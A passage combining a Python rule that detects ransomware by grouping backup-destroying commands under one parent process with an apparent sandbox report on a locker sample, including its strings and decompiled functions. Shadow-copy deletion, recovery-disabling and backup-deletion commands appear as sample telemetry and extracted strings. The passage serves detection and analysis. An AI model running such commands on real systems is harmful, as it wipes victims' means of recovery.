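def correlate(lines, window: timedelta = timedelta(seconds=60)) -> list[dict]:
    """Group matching events by (host, parent pid, parent image).

    Two or more distinct techniques from one parent within `window` of its first
    hit is rated high; an isolated hit is rated medium, because administrators
    do run a lone vssadmin delete by hand."""
    groups = defaultdict(list)
    for line in lines:
        ev = parse_event(line)
        hit = classify(ev.cmdline)
        if hit:
            groups[(ev.host, ev.ppid, ev.parent_image)].append((ev, hit))

    alerts = []
    for (host, ppid, parent), hits in groups.items():
        hits.sort(key=lambda h: h[0].ts)
        first = hits[0][0].ts
        burst = [h for h in hits if h[0].ts - first <= window]
        techniques = set().union(*(t for _, t in burst))
        alerts.append({
            "host": host, "ppid": ppid, "parent_image": parent,
            "techniques": sorted(techniques), "events": len(burst),
            "severity": "high" if len(techniques) >= 2 else "medium",
        })
    return alerts


# Constructed telemetry: WS01 shows the sample's chain as the strings list it;
# WS02 shows a routine, isolated shadow-copy deletion from an interactive shell.
SAMPLE_EVENTS = [
    r"2023-01-28T10:14:02|WS01|4120|C:\Users\Public\svhost.exe|4188|C:\Windows\System32\vssadmin.exe|vssadmin.exe Delete Shadows /All /Quiet",
    r"2023-01-28T10:14:03|WS01|4120|C:\Users\Public\svhost.exe|4196|C:\Windows\System32\bcdedit.exe|bcdedit.exe /set {default} recoveryenabled No",
    r"2023-01-28T10:14:03|WS01|4120|C:\Users\Public\svhost.exe|4204|C:\Windows\System32\bcdedit.exe|bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures",
    r"2023-01-28T10:14:04|WS01|4120|C:\Users\Public\svhost.exe|4212|C:\Windows\System32\wbadmin.exe|wbadmin DELETE SYSTEMSTATEBACKUP",
    r"2023-01-28T10:14:05|WS01|4120|C:\Users\Public\svhost.exe|4220|C:\Windows\System32\wbem\WMIC.exe|wmic.exe SHADOWCOPY /nointeractive",
    r"2023-01-28T11:30:00|WS02|900|C:\Windows\explorer.exe|2300|C:\Windows\System32\vssadmin.exe|vssadmin Delete Shadows /For=C: /Oldest /Quiet",
    r"2023-01-28T11:30:01|WS02|900|C:\Windows\explorer.exe|2310|C:\Windows\System32\ipconfig.exe|ipconfig /all",
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

Matching on the command line rather than the image name keeps the rule intact when the tool is invoked through a wrapper or renamed copy, and grouping by parent process is what lets the same regexes serve both as an isolated medium-severity hunt query and as a high-confidence ransomware alert when the whole chain fires from one process.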
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LockitMutexstd::_std::locale::_task$CreateH_prolog3InitLockit::_Lockit::~_OpenSetgloballocalestd::ios_base::goodstd::locale::global
                                      • String ID: [LOCKER] Add to autorun$[LOCKER] Init cryptor$[LOCKER] Init cryptor is failed$[LOCKER] Is already running$[LOCKER] Is running$[LOCKER] Kill processes$[LOCKER] Lock drive $[LOCKER] Put ID to HTML-code$[LOCKER] Put ID to HTML-code is failed!$[LOCKER] Remove backups $[LOCKER] Run scanning...$[LOCKER] Scan hidden devices$[LOCKER] Sleep at 60 seconds...$[LOCKER] Stop and delete services$bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures$bcdedit.exe /set {default} recoveryenabled No$p'$svhost$vssadmin.exe Delete Shadows /All /Quiet$wbadmin DELETE SYSTEMSTATEBACKUP$wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest$wmic.exe SHADOWCOPY /nointeractive${8761ABBD-7F85-42EE-B272-A76179687C63}${{IDENTIFIER}}
                                      • API String ID: 673517884-3686822622
                                      • Opcode ID: 4b7be7fad3db1b004673089a2ec90209d694685b4cefa6e9383e0541ac4ad584
                                      • Instruction ID: 94bc4994b1468a0cf6b90c40032f82e10f58e6e36656cfb12a74da27ece96eb4
                                      • Opcode Fuzzy Hash: 4b7be7fad3db1b004673089a2ec90209d694685b4cefa6e9383e0541ac4ad584
                                      • Instruction Fuzzy Hash: 96122F719101189BCB14EB60DC62BEDB3B5AF54342F4069E9A90A77192EF706F8DCF60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      C-Code - Quality: 96%
                                      			E00E64950(void* __ebx, char __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8, char _a12) {
                                      				signed int _v8;
                                      				char _v12;
                                      				intOrPtr* _v16;
                                      				char _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				intOrPtr _v32;
                                      				intOrPtr _v36;
                                      				intOrPtr _v40;
                                      				intOrPtr _v44;
                                      				intOrPtr _v48;
                                      				signed int _t59;
                                      				void* _t63;
                                      				char _t72;
                                      				void* _t80;
                                      				signed int _t128;
                                      
                                      				_t127 = __esi;
                                      				_t126 = __edi;
                                      				_t91 = __ebx;
                                      				_t59 =  *0xeef074; // 0x221cac15
                                      				_v8 = _t59 ^ _t128;
                                      				_v20 = __ecx;
                                      				_t3 =  &_v20; // 0xe6344b
                                      				_v16 = E00E51100( *_t3);
                                      				_v24 =  *((intOrPtr*)(_v16 + 0x10));
                                      				_t8 =  &_v20; // 0xe6344b
                                      				_t63 = E00E596F0(__ebx,  *_t8, __edi, __esi, __eflags);
                                      				_t135 = _t63 - _v24 - _a4;
                                      				if(_t63 - _v24 < _a4) {
                                      					E00E5BFD0();
                                      				}
                                      				_v32 = _v24 + _a4;
                                      				_v40 =  *((intOrPtr*)(_v16 + 0x14));
                                      				_t18 =  &_v20; // 0xe6344b
                                      				_v36 = E00E5C0F0(_t91,  *_t18, _v32, _t126, _t127, _t135, _v32);
                                      				_t20 =  &_v20; // 0xe6344b
                                      				_v28 = E00E56580( *_t20);
                                      				_t72 = E00E59B70(_v28, _t135,  ~(0 | _t135 > 0x00000000) | _v36 + 0x00000001); // executed
                                      				_v12 = _t72;
                                      				E00E516F0(_t72, _v16);
                                      				 *((intOrPtr*)(_v16 + 0x10)) = _v32;
                                      				 *((intOrPtr*)(_v16 + 0x14)) = _v36;
                                      				_v48 = E00E51650(_v12);
                                      				if(_v40 < 0x10) {
                                      					_t49 =  &_a12; // 0xe6344b
                                      					E00E63460( &_a8, _v48, _v16, _v24,  *_t49 & 0x000000ff);
                                      					_t80 = E00E51650(_v16);
                                      					_t123 = _v28;
                                      					E00E5B410(_v16, _v28, _t80,  &_v12);
                                      				} else {
                                      					asm("lfence");
                                      					_v44 =  *_v16;
                                      					_t39 =  &_a12; // 0xe6344b
                                      					E00E63460( &_a8, _v48, E00E51650(_v44), _v24,  *_t39 & 0x000000ff);
                                      					_t123 = _v44;
                                      					E00E59BA0(_v28, _v44, _v40 + 1);
                                      					 *_v16 = _v12;
                                      				}
                                      				return E00E89A35(_t91, _v8 ^ _t128, _t123, _t126, _t127);
                                      			}

                                      APIs
                                        • Part of subcall function 00E596F0: _Max_value.LIBCPMTD ref: 00E59726
                                        • Part of subcall function 00E596F0: _Min_value.LIBCPMTD ref: 00E5974C
                                      • allocator.LIBCONCRTD ref: 00E649CB
                                      • allocator.LIBCONCRTD ref: 00E64A3D
                                      • construct.LIBCPMTD ref: 00E64A7A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: allocator$Max_valueMin_valueconstruct
                                      • String ID: K4$K4
                                      • API String ID: 3172100163-3966304769
                                      • Opcode ID: 75d0b7653116b169471395592672fe65f46befa8c584f95660ddaf1038cb590f
                                      • Instruction ID: eaa449a796f715aa80282647604fc37fa994727f7819601998aaa9429cde6e30
                                      • Opcode Fuzzy Hash: 75d0b7653116b169471395592672fe65f46befa8c584f95660ddaf1038cb590f
                                      • Instruction Fuzzy Hash: A441B7B5E00109AFCB08DFA8D8919EEB7F5FF88301F149569E915B7351DB30AA04CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      [Rendered control-flow graph of E00EAE980 omitted: entry block eae980-eae9a1 calls eb0559; basic blocks are coloured Executed / Not Executed in the report and the edge list is not reproduced here]
                                      C-Code - Quality: 78%
                                      			E00EAE980(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                      				intOrPtr* _v8;
                                      				signed int _v12;
                                      				signed int _v16;
                                      				signed int _v20;
                                      				signed int _v40;
                                      				signed int _v44;
                                      				intOrPtr _v48;
                                      				signed int _v60;
                                      				char _v276;
                                      				short _v278;
                                      				short _v280;
                                      				char _v448;
                                      				signed int _v452;
                                      				short _v454;
                                      				intOrPtr _v456;
                                      				signed int _v460;
                                      				intOrPtr _v464;
                                      				signed int _v468;
                                      				signed int _v472;
                                      				intOrPtr _v512;
                                      				char _v536;
                                      				intOrPtr _v540;
                                      				signed int _v544;
                                      				intOrPtr _v548;
                                      				signed int _v560;
                                      				char _v708;
                                      				signed int _v712;
                                      				short _v714;
                                      				signed int* _v716;
                                      				signed int _v720;
                                      				signed int _v724;
                                      				signed int _v728;
                                      				signed int* _v732;
                                      				intOrPtr _v736;
                                      				signed int _v740;
                                      				signed int _v744;
                                      				signed int _v748;
                                      				signed int _v752;
                                      				char _v824;
                                      				char _v1252;
                                      				char _v1264;
                                      				intOrPtr _v1276;
                                      				signed int _v1288;
                                      				intOrPtr _v1324;
                                      				signed int _v1336;
                                      				void* __ebp;
                                      				signed int _t244;
                                      				signed int _t246;
                                      				void* _t249;
                                      				signed int _t252;
                                      				signed int _t254;
                                      				signed int _t261;
                                      				signed int _t262;
                                      				signed int _t263;
                                      				signed int _t264;
                                      				signed int _t265;
                                      				signed int _t267;
                                      				signed int _t269;
                                      				void* _t271;
                                      				signed int _t272;
                                      				signed int _t273;
                                      				signed int _t274;
                                      				signed int _t276;
                                      				signed int _t279;
                                      				signed int _t286;
                                      				signed int _t289;
                                      				signed int _t290;
                                      				intOrPtr _t291;
                                      				signed int _t294;
                                      				signed int _t296;
                                      				signed int _t297;
                                      				signed int _t300;
                                      				signed int _t302;
                                      				signed int _t305;
                                      				signed int _t306;
                                      				signed int _t308;
                                      				signed int _t328;
                                      				signed int _t330;
                                      				signed int _t332;
                                      				signed int _t337;
                                      				void* _t339;
                                      				signed int _t341;
                                      				void* _t342;
                                      				intOrPtr _t343;
                                      				signed int _t348;
                                      				signed int _t349;
                                      				intOrPtr* _t354;
                                      				signed int _t368;
                                      				signed int _t370;
                                      				void* _t371;
                                      				signed int _t372;
                                      				intOrPtr* _t373;
                                      				signed int _t375;
                                      				void* _t376;
                                      				void* _t380;
                                      				intOrPtr* _t385;
                                      				intOrPtr* _t388;
                                      				void* _t391;
                                      				signed int _t392;
                                      				signed int _t395;
                                      				intOrPtr* _t396;
                                      				char* _t403;
                                      				signed int _t405;
                                      				intOrPtr _t408;
                                      				intOrPtr* _t409;
                                      				signed int _t411;
                                      				signed int* _t415;
                                      				signed int _t416;
                                      				intOrPtr* _t422;
                                      				intOrPtr* _t423;
                                      				signed int _t432;
                                      				short _t433;
                                      				signed int _t435;
                                      				intOrPtr _t436;
                                      				void* _t437;
                                      				signed int _t439;
                                      				intOrPtr _t440;
                                      				void* _t441;
                                      				signed int _t442;
                                      				signed int _t445;
                                      				intOrPtr _t451;
                                      				signed int _t452;
                                      				void* _t453;
                                      				signed int _t454;
                                      				signed int _t455;
                                      				void* _t457;
                                      				signed int _t459;
                                      				signed int _t461;
                                      				signed int _t464;
                                      				signed int* _t465;
                                      				intOrPtr* _t466;
                                      				short _t467;
                                      				signed int _t469;
                                      				signed int _t470;
                                      				void* _t472;
                                      				void* _t473;
                                      				signed int _t474;
                                      				void* _t475;
                                      				void* _t476;
                                      				signed int _t477;
                                      				void* _t479;
                                      				void* _t480;
                                      				signed int _t492;
                                      
                                      				_t431 = __edx;
                                      				_push(__ebx);
                                      				_push(__esi);
                                      				_v12 = 1;
                                      				_t244 = E00EB0559(0x6a6); // executed
                                      				_t368 = _t244;
                                      				_t245 = 0;
                                      				_pop(_t380);
                                      				if(_t368 == 0) {
                                      					L20:
                                      					return _t245;
                                      				} else {
                                      					_push(__edi);
                                      					_t2 = _t368 + 4; // 0x4
                                      					_t435 = _t2;
                                      					 *_t435 = 0;
                                      					 *_t368 = 1;
                                      					_t451 = _a4;
                                      					_t246 = _t451 + 0x30;
                                      					_push( *_t246);
                                      					_v16 = _t246;
                                      					_push(0xecb080);
                                      					_push( *0xecafbc);
                                      					E00EAE8BC(_t368, _t380, _t435, _t451, _t435, 0x351, 3);
                                      					_t473 = _t472 + 0x18;
                                      					_v8 = 0xecafbc;
                                      					while(1) {
                                      						L2:
                                      						_t249 = E00EA5920(_t435, 0x351, 0xecb07c);
                                      						_t474 = _t473 + 0xc;
                                      						if(_t249 != 0) {
                                      							break;
                                      						} else {
                                      							_t8 = _v16 + 0x10; // 0x10
                                      							_t422 = _t8;
                                      							_t348 =  *_v16;
                                      							_v16 = _t422;
                                      							_t423 =  *_t422;
                                      							_v20 = _t423;
                                      							goto L4;
                                      						}
                                      						while(1) {
                                      							L4:
                                      							_t431 =  *_t348;
                                      							if(_t431 !=  *_t423) {
                                      								break;
                                      							}
                                      							if(_t431 == 0) {
                                      								L8:
                                      								_t349 = 0;
                                      							} else {
                                      								_t431 =  *((intOrPtr*)(_t348 + 2));
                                      								if(_t431 !=  *((intOrPtr*)(_t423 + 2))) {
                                      									break;
                                      								} else {
                                      									_t348 = _t348 + 4;
                                      									_t423 = _t423 + 4;
                                      									if(_t431 != 0) {
                                      										continue;
                                      									} else {
                                      										goto L8;
                                      									}
                                      								}
                                      							}
                                      							L10:
                                      							_push(_v20);
                                      							_push(0xecb080);
                                      							asm("sbb eax, eax");
                                      							_v12 = _v12 &  !( ~_t349);
                                      							_t354 = _v8 + 0xc;
                                      							_v8 = _t354;
                                      							_push( *_t354);
                                      							E00EAE8BC(_t368, _t423, _t435, _t451, _t435, 0x351, 3);
                                      							_t473 = _t474 + 0x18;
                                      							if(_v8 < 0xecafec) {
                                      								goto L2;
                                      							} else {
                                      								if(_v12 != 0) {
                                      									E00EB051F(_t368);
                                      									_t442 = _t435 | 0xffffffff;
                                      									__eflags =  *(_t451 + 0x28);
                                      									if(__eflags != 0) {
                                      										asm("lock xadd [ecx], eax");
                                      										if(__eflags == 0) {
                                      											E00EB051F( *(_t451 + 0x28));
                                      										}
                                      									}
                                      									__eflags =  *(_t451 + 0x24);
                                      									if( *(_t451 + 0x24) != 0) {
                                      										asm("lock xadd [eax], edi");
                                      										__eflags = _t442 == 1;
                                      										if(_t442 == 1) {
                                      											E00EB051F( *(_t451 + 0x24));
                                      										}
                                      									}
                                      									 *(_t451 + 0x24) = 0;
                                      									 *(_t451 + 0x1c) = 0;
                                      									 *(_t451 + 0x28) = 0;
                                      									 *((intOrPtr*)(_t451 + 0x20)) = 0;
                                      									_t245 =  *((intOrPtr*)(_t451 + 0x40));
                                      								} else {
                                      									_t445 = _t435 | 0xffffffff;
                                      									_t492 =  *(_t451 + 0x28);
                                      									if(_t492 != 0) {
                                      										asm("lock xadd [ecx], eax");
                                      										if(_t492 == 0) {
                                      											E00EB051F( *(_t451 + 0x28));
                                      										}
                                      									}
                                      									if( *(_t451 + 0x24) != 0) {
                                      										asm("lock xadd [eax], edi");
                                      										if(_t445 == 1) {
                                      											E00EB051F( *(_t451 + 0x24));
                                      										}
                                      									}
                                      									 *(_t451 + 0x24) =  *(_t451 + 0x24) & 0x00000000;
                                      									_t28 = _t368 + 4; // 0x4
                                      									_t245 = _t28;
                                      									 *(_t451 + 0x1c) =  *(_t451 + 0x1c) & 0x00000000;
                                      									 *(_t451 + 0x28) = _t368;
                                      									 *((intOrPtr*)(_t451 + 0x20)) = _t245;
                                      								}
                                      								goto L20;
                                      							}
                                      							goto L136;
                                      						}
                                      						asm("sbb eax, eax");
                                      						_t349 = _t348 | 0x00000001;
                                      						__eflags = _t349;
                                      						goto L10;
                                      					}
                                      					_push(0);
                                      					_push(0);
                                      					_push(0);
                                      					_push(0);
                                      					_push(0);
                                      					E00EA4980();
                                      					asm("int3");
                                      					_t469 = _t474;
                                      					_t475 = _t474 - 0x1d0;
                                      					_t252 =  *0xeef074; // 0x221cac15
                                      					_v60 = _t252 ^ _t469;
                                      					_t254 = _v44;
                                      					_push(_t368);
                                      					_push(_t451);
                                      					_t452 = _v40;
                                      					_push(_t435);
                                      					_t436 = _v48;
                                      					_v512 = _t436;
                                      					__eflags = _t254;
                                      					if(_t254 == 0) {
                                      						_v460 = 1;
                                      						_v472 = 0;
                                      						_t370 = 0;
                                      						_v452 = 0;
                                      						__eflags = _t452;
                                      						if(__eflags == 0) {
                                      							L80:
                                      							E00EAE980(_t370, _t431, _t436, _t452, __eflags, _t436); // executed
                                      							goto L81;
                                      						} else {
                                      							__eflags =  *_t452 - 0x4c;
                                      							if( *_t452 != 0x4c) {
                                      								L60:
                                      								_t261 = E00EAE4F6(_t370, _t431, _t436, _t452, _t452,  &_v276, 0x83,  &_v448, 0x55,  &_v468);
                                      								_t476 = _t475 + 0x18;
                                      								__eflags = _t261;
                                      								if(_t261 != 0) {
                                      									__eflags = 0;
                                      									_t432 = _t436 + 0x20;
                                      									_t454 = 0;
                                      									_v452 = _t432;
                                      									do {
                                      										__eflags = _t454;
                                      										if(_t454 == 0) {
                                      											L75:
                                      											_t262 = _v460;
                                      										} else {
                                      											_t385 =  *_t432;
                                      											_t263 =  &_v276;
                                      											while(1) {
                                      												__eflags =  *_t263 -  *_t385;
                                      												_t436 = _v464;
                                      												if( *_t263 !=  *_t385) {
                                      													break;
                                      												}
                                      												__eflags =  *_t263;
                                      												if( *_t263 == 0) {
                                      													L68:
                                      													_t264 = 0;
                                      												} else {
                                      													_t433 =  *((intOrPtr*)(_t263 + 2));
                                      													__eflags = _t433 -  *((intOrPtr*)(_t385 + 2));
                                      													_v454 = _t433;
                                      													_t432 = _v452;
                                      													if(_t433 !=  *((intOrPtr*)(_t385 + 2))) {
                                      														break;
                                      													} else {
                                      														_t263 = _t263 + 4;
                                      														_t385 = _t385 + 4;
                                      														__eflags = _v454;
                                      														if(_v454 != 0) {
                                      															continue;
                                      														} else {
                                      															goto L68;
                                      														}
                                      													}
                                      												}
                                      												L70:
                                      												__eflags = _t264;
                                      												if(_t264 == 0) {
                                      													_t370 = _t370 + 1;
                                      													__eflags = _t370;
                                      													goto L75;
                                      												} else {
                                      													_t265 =  &_v276;
                                      													_push(_t265);
                                      													_push(_t454);
                                      													_push(_t436);
                                      													L84();
                                      													_t432 = _v452;
                                      													_t476 = _t476 + 0xc;
                                      													__eflags = _t265;
                                      													if(_t265 == 0) {
                                      														_t262 = 0;
                                      														_v460 = 0;
                                      													} else {
                                      														_t370 = _t370 + 1;
                                      														goto L75;
                                      													}
                                      												}
                                      												goto L76;
                                      											}
                                      											asm("sbb eax, eax");
                                      											_t264 = _t263 | 0x00000001;
                                      											__eflags = 0;
                                      											goto L70;
                                      										}
                                      										L76:
                                      										_t454 = _t454 + 1;
                                      										_t432 = _t432 + 0x10;
                                      										_v452 = _t432;
                                      										__eflags = _t454 - 5;
                                      									} while (_t454 <= 5);
                                      									__eflags = _t262;
                                      									if(__eflags != 0) {
                                      										goto L80;
                                      									} else {
                                      										__eflags = _t370;
                                      										if(__eflags != 0) {
                                      											goto L80;
                                      										} else {
                                      										}
                                      									}
                                      								}
                                      								goto L81;
                                      							} else {
                                      								__eflags =  *(_t452 + 2) - 0x43;
                                      								if( *(_t452 + 2) != 0x43) {
                                      									goto L60;
                                      								} else {
                                      									__eflags =  *((short*)(_t452 + 4)) - 0x5f;
                                      									if( *((short*)(_t452 + 4)) != 0x5f) {
                                      										goto L60;
                                      									} else {
                                      										while(1) {
                                      											_t267 = E00EB84C6(_t452, 0xecb074);
                                      											_t372 = _t267;
                                      											_v468 = _t372;
                                      											_pop(_t387);
                                      											__eflags = _t372;
                                      											if(_t372 == 0) {
                                      												break;
                                      											}
                                      											_t269 = _t267 - _t452;
                                      											__eflags = _t269;
                                      											_v460 = _t269 >> 1;
                                      											if(_t269 == 0) {
                                      												break;
                                      											} else {
                                      												_t271 = 0x3b;
                                      												__eflags =  *_t372 - _t271;
                                      												if( *_t372 == _t271) {
                                      													break;
                                      												} else {
                                      													_t439 = _v460;
                                      													_t373 = 0xecafbc;
                                      													_v456 = 1;
                                      													do {
                                      														_t272 = E00EB0488( *_t373, _t452, _t439);
                                      														_t475 = _t475 + 0xc;
                                      														__eflags = _t272;
                                      														if(_t272 != 0) {
                                      															goto L46;
                                      														} else {
                                      															_t388 =  *_t373;
                                      															_t431 = _t388 + 2;
                                      															do {
                                      																_t343 =  *_t388;
                                      																_t388 = _t388 + 2;
                                      																__eflags = _t343 - _v472;
                                      															} while (_t343 != _v472);
                                      															_t387 = _t388 - _t431 >> 1;
                                      															__eflags = _t439 - _t388 - _t431 >> 1;
                                      															if(_t439 != _t388 - _t431 >> 1) {
                                      																goto L46;
                                      															}
                                      														}
                                      														break;
                                      														L46:
                                      														_v456 = _v456 + 1;
                                      														_t373 = _t373 + 0xc;
                                      														__eflags = _t373 - 0xecafec;
                                      													} while (_t373 <= 0xecafec);
                                      													_t370 = _v468 + 2;
                                      													_t273 = E00EB846D(_t387, _t370, 0xecb07c);
                                      													_t436 = _v464;
                                      													_t455 = _t273;
                                      													_pop(_t391);
                                      													__eflags = _t455;
                                      													if(_t455 != 0) {
                                      														L49:
                                      														__eflags = _v456 - 5;
                                      														if(_v456 > 5) {
                                      															_t392 = _v452;
                                      															goto L55;
                                      														} else {
                                      															_push(_t455);
                                      															_t276 = E00EAFAFC( &_v276, 0x83, _t370);
                                      															_t477 = _t475 + 0x10;
                                      															__eflags = _t276;
                                      															if(_t276 != 0) {
                                      																L83:
                                      																_push(0);
                                      																_push(0);
                                      																_push(0);
                                      																_push(0);
                                      																_push(0);
                                      																E00EA4980();
                                      																asm("int3");
                                      																_push(_t469);
                                      																_t470 = _t477;
                                      																_t279 =  *0xeef074; // 0x221cac15
                                      																_v560 = _t279 ^ _t470;
                                      																_push(_t370);
                                      																_t375 = _v544;
                                      																_push(_t455);
                                      																_push(_t436);
                                      																_t440 = _v548;
                                      																_v1288 = _t375;
                                      																_v1276 = E00EB0EFC(_t391, _t431) + 0x278;
                                      																_t286 = E00EAE4F6(_t375, _t431, _t440, _v540, _v540,  &_v824, 0x83,  &_v1252, 0x55,  &_v1264);
                                      																_t479 = _t477 - 0x2e4 + 0x18;
                                      																__eflags = _t286;
                                      																if(_t286 == 0) {
                                      																	L124:
                                      																	__eflags = 0;
                                      																	goto L125;
                                      																} else {
                                      																	_t103 = _t375 + 2; // 0x6
                                      																	_t459 = _t103 << 4;
                                      																	__eflags = _t459;
                                      																	_t289 =  &_v280;
                                      																	_v724 = _t459;
                                      																	_t431 =  *(_t459 + _t440);
                                      																	_t395 =  *(_t459 + _t440);
                                      																	while(1) {
                                      																		_v712 = _v712 & 0x00000000;
                                      																		__eflags =  *_t289 -  *_t395;
                                      																		_t461 = _v724;
                                      																		if( *_t289 !=  *_t395) {
                                      																			break;
                                      																		}
                                      																		__eflags =  *_t289;
                                      																		if( *_t289 == 0) {
                                      																			L91:
                                      																			_t290 = _v712;
                                      																		} else {
                                      																			_t467 =  *((intOrPtr*)(_t289 + 2));
                                      																			__eflags = _t467 -  *((intOrPtr*)(_t395 + 2));
                                      																			_v714 = _t467;
                                      																			_t461 = _v724;
                                      																			if(_t467 !=  *((intOrPtr*)(_t395 + 2))) {
                                      																				break;
                                      																			} else {
                                      																				_t289 = _t289 + 4;
                                      																				_t395 = _t395 + 4;
                                      																				__eflags = _v714;
                                      																				if(_v714 != 0) {
                                      																					continue;
                                      																				} else {
                                      																					goto L91;
                                      																				}
                                      																			}
                                      																		}
                                      																		L93:
                                      																		__eflags = _t290;
                                      																		if(_t290 != 0) {
                                      																			_t396 =  &_v280;
                                      																			_t431 = _t396 + 2;
                                      																			do {
                                      																				_t291 =  *_t396;
                                      																				_t396 = _t396 + 2;
                                      																				__eflags = _t291 - _v712;
                                      																			} while (_t291 != _v712);
                                      																			_v728 = (_t396 - _t431 >> 1) + 1;
                                      																			_t294 = E00EB0559(4 + ((_t396 - _t431 >> 1) + 1) * 2);
                                      																			_v740 = _t294;
                                      																			__eflags = _t294;
                                      																			if(_t294 == 0) {
                                      																				goto L124;
                                      																			} else {
                                      																				_v736 =  *((intOrPtr*)(_t461 + _t440));
                                      																				_v748 =  *(_t440 + 0xa0 + _t375 * 4);
                                      																				_v752 =  *(_t440 + 8);
                                      																				_t403 =  &_v280;
                                      																				_v716 = _t294 + 4;
                                      																				_t296 = E00EA58BC(_t294 + 4, _v728, _t403);
                                      																				_t480 = _t479 + 0xc;
                                      																				__eflags = _t296;
                                      																				if(_t296 != 0) {
                                      																					_t297 = _v712;
                                      																					_push(_t297);
                                      																					_push(_t297);
                                      																					_push(_t297);
                                      																					_push(_t297);
                                      																					_push(_t297);
                                      																					E00EA4980();
                                      																					asm("int3");
                                      																					_push(_t470);
                                      																					_push(_t403);
                                      																					_v1336 = _v1336 & 0x00000000;
                                      																					_t300 = E00EB16D5(_v1324, 0x20001004,  &_v1336, 2);
                                      																					__eflags = _t300;
                                      																					if(_t300 == 0) {
                                      																						L134:
                                      																						return 0xfde9;
                                      																					}
                                      																					_t302 = _v20;
                                      																					__eflags = _t302;
                                      																					if(_t302 == 0) {
                                      																						goto L134;
                                      																					}
                                      																					return _t302;
                                      																				} else {
                                      																					__eflags = _v280 - 0x43;
                                      																					 *((intOrPtr*)(_t461 + _t440)) = _v716;
                                      																					if(_v280 != 0x43) {
                                      																						L102:
                                      																						_t305 = E00EAE213(_t375, _t440,  &_v708);
                                      																						_t405 = _v712;
                                      																					} else {
                                      																						__eflags = _v278;
                                      																						if(_v278 != 0) {
                                      																							goto L102;
                                      																						} else {
                                      																							_t405 = _v712;
                                      																							_t305 = _t405;
                                      																						}
                                      																					}
                                      																					 *(_t440 + 0xa0 + _t375 * 4) = _t305;
                                      																					__eflags = _t375 - 2;
                                      																					if(_t375 != 2) {
                                      																						__eflags = _t375 - 1;
                                      																						if(_t375 != 1) {
                                      																							__eflags = _t375 - 5;
                                      																							if(_t375 == 5) {
                                      																								 *((intOrPtr*)(_t440 + 0x14)) = _v720;
                                      																							}
                                      																						} else {
                                      																							 *((intOrPtr*)(_t440 + 0x10)) = _v720;
                                      																						}
                                      																					} else {
                                      																						_t465 = _v732;
                                      																						_t431 = _t405;
                                      																						_t415 = _t465;
                                      																						 *(_t440 + 8) = _v720;
                                      																						_v716 = _t465;
                                      																						_v728 = _t465[8];
                                      																						_v720 = _t465[9];
                                      																						while(1) {
                                      																							__eflags =  *(_t440 + 8) -  *_t415;
                                      																							if( *(_t440 + 8) ==  *_t415) {
                                      																								break;
                                      																							}
                                      																							_t466 = _v716;
                                      																							_t431 = _t431 + 1;
                                      																							_t337 =  *_t415;
                                      																							 *_t466 = _v728;
                                      																							_v720 = _t415[1];
                                      																							_t415 = _t466 + 8;
                                      																							 *((intOrPtr*)(_t466 + 4)) = _v720;
                                      																							_t375 = _v744;
                                      																							_t465 = _v732;
                                      																							_v728 = _t337;
                                      																							_v716 = _t415;
                                      																							__eflags = _t431 - 5;
                                      																							if(_t431 < 5) {
                                      																								continue;
                                      																							} else {
                                      																							}
                                      																							L110:
                                      																							__eflags = _t431 - 5;
                                      																							if(__eflags == 0) {
                                      																								_t328 = E00EB5E4E(_t431, __eflags, _v712, 1, 0xecaf30, 0x7f,  &_v536,  *(_t440 + 8), 1);
                                      																								_t480 = _t480 + 0x1c;
                                      																								__eflags = _t328;
                                      																								if(_t328 == 0) {
                                      																									_t416 = _v712;
                                      																								} else {
                                      																									_t330 = _v712;
                                      																									do {
                                      																										 *(_t470 + _t330 * 2 - 0x20c) =  *(_t470 + _t330 * 2 - 0x20c) & 0x000001ff;
                                      																										_t330 = _t330 + 1;
                                      																										__eflags = _t330 - 0x7f;
                                      																									} while (_t330 < 0x7f);
                                      																									_t332 = E00EA19FD( &_v536,  *0xeef2b8, 0xfe);
